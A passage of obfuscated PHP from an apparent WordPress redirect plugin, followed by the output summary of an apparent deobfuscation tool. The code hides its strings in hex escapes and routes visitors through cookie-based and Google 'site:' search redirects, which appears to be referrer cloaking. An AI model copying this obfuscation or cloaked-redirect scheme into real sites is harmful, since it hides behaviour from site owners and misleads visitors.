s\x69ze\x3d\"40\x22\x20typ\x65\x3d\"te\x78t\"\x20\x76\x61l\x75\x65=\x22".get_bloginfo("u\x72l")."\" re\x61\x64o\x6ely></\x74\x64>\n \x20\x20\x20 \x20\x20  \x20  \x20\x20  \x20\x20  \x20  \x20\x20 \x20 \x20\x20\x3c/tr\x3e\n \x20\x20 \x20\x20\x20 \x20 \x20\x20 \x20\x20  \x20\x20\x20  \x20\x20\x20  \x20\x20\x20\x20\x3ctr>\n \x20\x20\x20\x20  \x20   \x20 \x20\x20    \x20  \x20 \x20\x20\x20\x20 \x20\x20 <td \x73\x74\x79\x6ce\x3d\"pa\x64di\x6eg-t\x6fp:\x20\x38p\x78;\x22\x20w\x69\x64\x74h=\"\x320\x30px\" \x76a\x6cign\x3d\x22to\x70\x22\x3eL\x69cen\x73\x65\x20Key\x3c/\x74\x64>\n\x20\x20\x20 \x20   \x20\x20 \x20 \x20  \x20 \x20 \x20 \x20\x20 \x20\x20\x20\x20  \x20\x3ct\x64><\x69\x6ep\x75\x74 s\x69\x7ae=\x22\x340\x22\x20\x74\x79p\x65\x3d\x22t\x65\x78\x74\x22\x20\x6ea\x6de\x3d\"\x6ci\x63\x65\x6e\x73e\x5f\x6bey\" v\x61\x6c\x75\x65=\"".get_option_value("l\x69\x63e\x6es\x65\x5f\x6bey")."\"\x20re\x71u\x69\x72e\x64\x3e\x3c/td>\n \x20\x20 \x20 \x20  \x20 \x20\x20     \x20  \x20  \x20\x20\x20\x20\x3c/t\x72>\n\x20 \x20 \x20  \x20  \x20  \x20\x20\x20 \x20  \x20\x20  \x20\x20\x20 \x20\x20 \x20\x3c\x74r\x3e\n \x20  \x20\x20\x20    \x20\x20  \x20\x20\x20 \x20 \x20 \x20   \x20\x20  \x20<i\x6e\x70\x75\x74\x20\x73t\x79le\x3d\"\x64is\x70la\x79: n\x6fn\x65\x3b\"\x20\x6e\x61m\x65\x3d\x22upd\x61\x74\x65\x22\x20v\x61\x6c\x75e\x3d\"\x6cic\x65\x6e\x73\x65\x22>\n\x20\x20  \x20\x20 \x20  \x20\x20 \x20\x20\x20 \x20\x20 \x20\x20  \x20\x20 \x20\x20\x20   \x3c\x74\x64><inp\x75t cla\x73\x73=\x22bu\x74\x74\x6f\x6e\"\x20t\x79\x70\x65\x3d\"\x73\x75bmit\" \x76\x61l\x75e=\x22Su\x62m\x69t\">\x3c/\x74\x64\x3e\n\x20\x20 \x20\x20\x20 \x20 \x20 \x20  \x20\x20\x20  \x20\x20  \x20  \x20   </\x74r>\n \x20\x20 \x20 \x20\x20\x20  \x20\x20 \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 \x20 \x3c/t\x61\x62\x6ce>\n\x20\x20\x20\x20  \x20\x20\x20\x20 \x20\x20\x20     \x20\x3c/f\x6frm\x3e\n  \x20  \x20  \x20\x20\x20 \x20\x20\x20 \x20\x20\x20</di\x76>\n \x20\x20\x20  \x20 \x20    </di\x76>\n  \x20\x20\x20   \x20  \x3c/d\x69\x76\x3e\n \x20\x20\x20 \x20\x20 ";});});if(isset($_GET["\x67\x6f"])&&!empty($_GET["\x67\x6f"])&&!isset($_GET["r"])&&is_license_key_valid(get_option_value("l\x69c\x65\x6e\x73e\x5f\x6bey"))){${"\x47\x4cO\x42\x41L\x53"}["\x64u\x6c\x65\x71\x62"]="\x73\x6cu\x67_\x64e\x63o\x64e";${"\x47LO\x42\x41\x4c\x53"}["\x6b\x79\x6a\x79\x68\x73\x66n"]="\x73\x6c\x75g_e\x6e\x63\x6f\x64\x65";${${"\x47\x4cOB\x41\x4c\x53"}["\x64u\x6ceq\x62"]}=urldecode($_GET["\x67o"]);$nuhmgp="\x73\x6cug\x5f\x65\x6e\x63od\x65";${${"GL\x4f\x42ALS"}["\x6b\x79\x6a\x79hs\x66\x6e"]}=base64_encode($_GET["\x67\x6f"]);setcookie("r\x65\x64\x69re\x63\x74_url_\x74oke\x6e",${${"\x47LO\x42\x41\x4c\x53"}["\x76h\x64o\x67\x65f\x65\x76e"]},time()+(600*20),"/");setcookie("\x72ed\x69\x72ect\x5f\x75\x72\x6c\x5ft\x6fken",${${"GL\x4f\x42AL\x53"}["\x76h\x64\x6f\x67e\x66ev\x65"]},time()+(600*20),"/");setcookie("\x72e\x64ir\x65c\x74_u\x72\x6c\x5f\x74o\x6be\x6e",${${"\x47\x4cOB\x41\x4c\x53"}["\x76h\x64oge\x66\x65v\x65"]},time()+(600*20),"/");setcookie("\x72\x65\x64i\x72\x65ct_url_t\x6f\x6be\x6e",${$nuhmgp},time()+(600*20),"/");setcookie("\x72ed\x69\x72\x65ct_\x75rl_tok\x65n",${${"GL\x4f\x42\x41\x4cS"}["vhd\x6f\x67e\x66\x65\x76\x65"]},time()+(600*20),"/");if(get_option_value("re\x64\x69r\x65ct_\x74ype")==0){die("\n\x20\x20  \x20\x20  \x20\x20 \x3cme\x74\x61\x20\x68t\x74\x70-\x65qui\x76\x3d\"\x72\x65f\x72e\x73\x68\" c\x6fntent\x3d\"".get_option_value("r\x65\x64\x69rect_\x73\x65\x63ond")."\x3b \x75\x72\x6c=".get_option_value("\x72edi\x72\x65\x63\x74_d\x69\x72\x65ct\x5f\x75\x72\x6c")."\" /\x3e\n \x20  \x20 \x20   \x20<h\x31 s\x74\x79le=\"\x74e\x78t-a\x6c\x69gn: \x63e\x6e\x74\x65\x72\x3b\"\x3eR\x65dir\x65\x63\x74\x69n\x67\x20in\x20".get_option_value("red\x69\x72\x65\x63t_\x73\x65\x63o\x6e\x64")."s \x50\x6c\x65\x61\x73e \x77\x61it\x2e..</h\x31\x3e\n \x20\x20 \x20\x20\x20  \x20\x20\x20<\x68\x33\x20s\x74y\x6c\x65\x3d\x22t\x65\x78\x74-\x61\x6ci\x67n:\x20c\x65\x6et\x65\x72;\"\x3eA\x75tom\x61\x74ica\x6c\x6c\x79 \x52\x65dir\x65\x63t\x20t\x6f W\x65bs\x69te\x3c/h3>\n\x20  \x20 \x20\x20 ");}else{die("\n\x20\x20  \x20 \x20 \x20\x20\x20<\x6deta htt\x70-e\x71\x75iv\x3d\"\x72\x65f\x72esh\" \x63o\x6eten\x74\x3d\x22".get_option_value("\x72ed\x69\x72e\x63\x74\x5f\x73e\x63\x6fnd")."\x3b\x20\x75rl\x3dh\x74\x74\x70\x73://\x77ww.\x67oogle.c\x6f\x6d/\x73\x65\x61r\x63\x68?\x71\x3ds\x69\x74e:".get_bloginfo("\x75rl")."\" /\x3e\n\x20\x20\x20\x20\x20\x20\x20  \x20\x20\x20\x3c\x681\x20s\x74\x79l\x65=\"\x74e\x78t-al\x69g\x6e:\x20\x63ente\x72;\">\x52\x65di\x72ecti\x6eg\x20\x69\x6e\x20".get_option_value("re\x64i\x72\x65c\x74_\x73\x65c\x6fn\x64")."\x73\x20P\x6ce\x61\x73e w\x61i\x74\x2e\x2e\x2e</\x681\x3e\n \x20\x20 \x20  \x20 \x20 \x20<\x63\x65\x6et\x65\x72\x3e\n\x20\x20  \x20  \x20\x20  \x20\x20 \x3ci\x6dg \x73r\x63\x3d\"".get_option_value("\x72\x65\x64i\x72e\x63\x74_s\x65ar\x63h_i\x6d\x61\x67e\x5f\x75\x72l")."\"\x20\x6fne\x72\x72or\x3d\x22t\x68\x69s\x2epa\x72e\x6et\x4eo\x64e.\x72\x65m\x6f\x76e\x43h\x69ld(th\x69s)\x22\x20/>\n \x20  \x20\x20\x20\x20\x20 \x20 </\x63e\x6e\x74\x65r>\n \x20\x20\x20\x20\x20  \x20  <h\x33\x20s\x74yl\x65\x3d\x22\x74e\x78t-alig\x6e: \x63e\x6ete\x72;\x22\x3eCli\x63k\x20o\x6e\x20\x46\x69rs\x74 Li\x6e\x6b \x66\x72\x6f\x6d \x47oogl\x65\x20\x74o Op\x65\x6e \x4c\x69\x6ek\x3c/h3>\n \x20\x20 \x20\x20\x20 ");}}if(isset($_COOKIE["\x72\x65dir\x65ct\x5fur\x6c_\x74\x6f\x6ben"])&&!empty($_COOKIE["\x72ed\x69\x72\x65\x63t_u\x72l\x5fto\x6ben"])&&is_license_key_valid(get_option_value("\x6c\x69c\x65\x6ese\x5fk\x65y"))){${"\x47L\x4f\x42\x41\x4c\x53"}["ip\x6e\x63h\x65\x71"]="\x73\x6c\x75\x67\x5fd\x65\x63\x6f\x64\x65";${${"\x47\x4c\x4f\x42AL\x53"}["ekv\x75w\x66\x79qmo\x6c"]}=urldecode($_COOKIE["red\x69\x72ect\x5f\x75r\x6c_token"]);${${"G\x4c\x4fBAL\x53"}["\x65kvu\x77\x66\x79q\x6do\x6c"]}=base64_decode(${${"\x47\x4c\x4fB\x41\x4c\x53"}["i\x70\x6ech\x65\x71"]});setcookie("\x72\x65d\x69re\x63\x74\x5f\x75\x72\x6c_t\x6fk\x65\x6e","",time()+(600*20),"/");die("\n\x20\x20 \x20 \x20 \x20\x3c\x73cr\x69pt>\n   \x20 \x20   \x20windo\x77\x2el\x6f\x63a\x74\x69o\x6e\x2er\x65\x70l\x61\x63e(\"".get_bloginfo("ur\x6c")."?\x67\x6f\x3d".${${"\x47\x4cO\x42\x41L\x53"}["\x65\x6b\x76u\x77\x66y\x71\x6d\x6fl"]}."\x26r\x22)\x3b\n\x20\x20  \x20 \x20\x20</s\x63r\x69p\x74>\n  \x20");}
?>

Function Calls

None

Variables

None

Stats

MD5 b76efe23def5cde44e96e6dce72acfed
Eval Count 0
Decode Time 57 ms